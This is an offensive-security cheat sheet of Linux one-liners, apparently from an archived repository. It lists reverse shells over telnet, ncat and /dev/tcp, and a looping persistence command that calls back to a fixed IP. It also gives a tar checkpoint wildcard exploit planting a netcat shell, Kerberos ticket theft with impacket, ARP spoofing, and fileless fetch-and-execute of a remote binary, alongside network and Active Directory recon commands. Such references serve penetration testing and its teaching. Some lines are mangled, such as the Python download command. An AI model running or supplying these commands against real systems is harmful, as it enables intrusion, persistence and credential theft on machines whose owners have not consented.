-
Reverse shell one-liners:
- Telnet:
mkfifo /tmp/cth; sh -i 2>&1 </tmp/cth | telnet <atkIP> 8443 >/tmp/cth; rm /tmp/cth
(touch /dev/shm/cth; sleep 60; rm -f /dev/shm/cth) & tail -f /dev/shm/cth | sh -i 2>&1 | telnet <atkIP> <port> >/dev/shm/cth
- Encrypted
- Ncat
- Listener:
ncat —ssl -nlvp 443
- Connector:
ncat —ssl <listener ip> 443 -e /bin/bash
- Listener:
- Ncat
- Quick persistence
while :; do setsid bash -i &>/dev/tcp/1.1.1.1/8443 0>&1; sleep 120; done &>/dev/null &
- Telnet:
-
Find all files owned by a user in Linux, disregarding /proc and /sys files
find / -user <username> -ls 2>/dev/null | grep -v '/proc\| /run\| /sys'
-
Log everything that happens in a terminal/tmux pane
script <filename.log>
-
Download files
- BASH only:
bash -c "cat < /dev/tcp/10.13.10.69/18110" > nmap
- Encrypted:
- Encrypt:
openssl enc -aes-256-cbc -pbkdf2 -k strongPass <input.txt >input.txt.enc
- Decrypt:
openssl enc -d -aes-256-cbc -pbkdf2 -k strongPass <input.txt.enc >input.txt
- Encrypt:
- BASH only:
-
TAR exploit:
echo "mkfifo /tmp/lhennp; nc 192.168.1.102 8888 0</tmp/lhennp | /bin/sh >/tmp/lhennp 2>&1; rm /tmp/lhennp" > shell.sh echo "" > "--checkpoint-action=exec=sh shell.sh" echo "" > --checkpoint=1 tar cf archive.tar *
-
Upgrade reverse shell
- Using socat (upload static binary)
- On target:
socat file:`tty`,raw,echo=0 tcp-listen:4444
- On attacker:
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:<attackerip>:4444
- On target:
- Using socat (upload static binary)
-
Extract Kerberos ccache files
- ccache files for logged-in users are located in /tmp
scp root@10.10.120.45:/tmp/krb5cc\_613405103\_HEquhW .
- Convert ccache file into .kirbi file using impacket
impacket-ticketConverter krb5cc\_613405103\_HEquhW amitchell.kirbi
- kerberos_ticket_use to leverage the TGT
- ccache files for logged-in users are located in /tmp
-
View neighbor IPs (useful for docker containers)
ip ne
"ip -br -c ne
-
Generate public RSA key from private
ssh-keygen -y -e -f id_rsa
-
IPtables
iptables -A INPUT -s <RHOST> -p tcp --dport <LPORT> -j ACCEPT
- Omit
-s
to open a port to connections from all origins --dport
can accept a range of ports as well as single ports
- Omit
-
ARP
- See local ARP cache
arp -n
arp -a -i <interface>
- arp-scan
- ARP spoof/poisoning
./arplayer spoof -I wlp1s0 -vvv -F -b 192.168.1.101 192.168.1.1
- ARP scan
./arplayer scan -I wlp1s0 -w 10 -t 1000
- See local ARP cache
-
Ping Sweep
for i in
seq 1 255; do ping -c 1 192.168.1.$i | tr \\n ' ' | awk '/1 received/ {print $2}'; done
-
SMB Service Discovery
nbtscan –v –s : x.x.x.x/24 | cut -d “:“ –f 1 > smb-hosts.txt
- Check for SMB signing:
smbclient --client-protection=off
and observe response
-
Any Service Discovery
for i in
seq 1 254; do nc -zvw1 x.x.x.$i SERVICE_PORT 2>&1 | grep "Connected" | cut -d " " -f4 | cut -d ":" -f1 >> x-hosts.txt;done
-
NFS Shares
- Display the NFS server's export list of mountable shares
showmount -e <ip>
- List both the client hostname or IP address and mounted directory
showmount -a <ip>
- Mount an NFS share located at IP to /mnt/nfs
sudo mount -t nfs <ip>:<share name> /mnt/nfs
- Display the NFS server's export list of mountable shares
-
ss
- Show listening ports like
netstat -anp tcp
ss -tulpn
- Show listening ports like
-
Rename terminal
#!bin/bash echo -ne "\033]0;${1}\007"
-
Using shar to pack files/tools for target:
- Pack files on attack machine:
shar *.exe *.kirbi >a.shar
- Execute on target to extract:
chmod +x a.shar; ./a.shar
- Pack files on attack machine:
-
Propertly destroy file instead of just deleting:
shred -z cthulhu.txt
-
Run files without touching disk
- Python
python3 -c 'import os; import urllib.request; d = urllib.request.urlopen("https://github.com/andrew-d/static-binaries/blob/master/binaries/linux/x86_64/nmap?raw=true"); fd = os.memfd_create("foo"); os.write(fd, http://d.read()); p = f"/proc/self/fd/{fd}"; os.execve(p, [p, "-h"],{})'
- No python:
- Python
-
If you don't have
ifconfig
orip
and need to enumerate networking information (such as if you're in a Docker container):- View the local IP
cat /proc/net/fib_trie
- View port data in hex:
cat /proc/net/tcp
- View the local IP
-
ldapsearch for Active Directory recon
ldapsearch –x –h 10.0.0.1 –b “DC=contoso,DC=com”
- Look for OUs in the dump to get a sense for how domain is organized
- Mount SYSVOL:
- look in scripts folder for file shares mapped on user login
- look at GPO that sets bookmarks and evaluate the bookmarks for internal hosts
This repository has been archived by the owner on May 20, 2024. It is now read-only.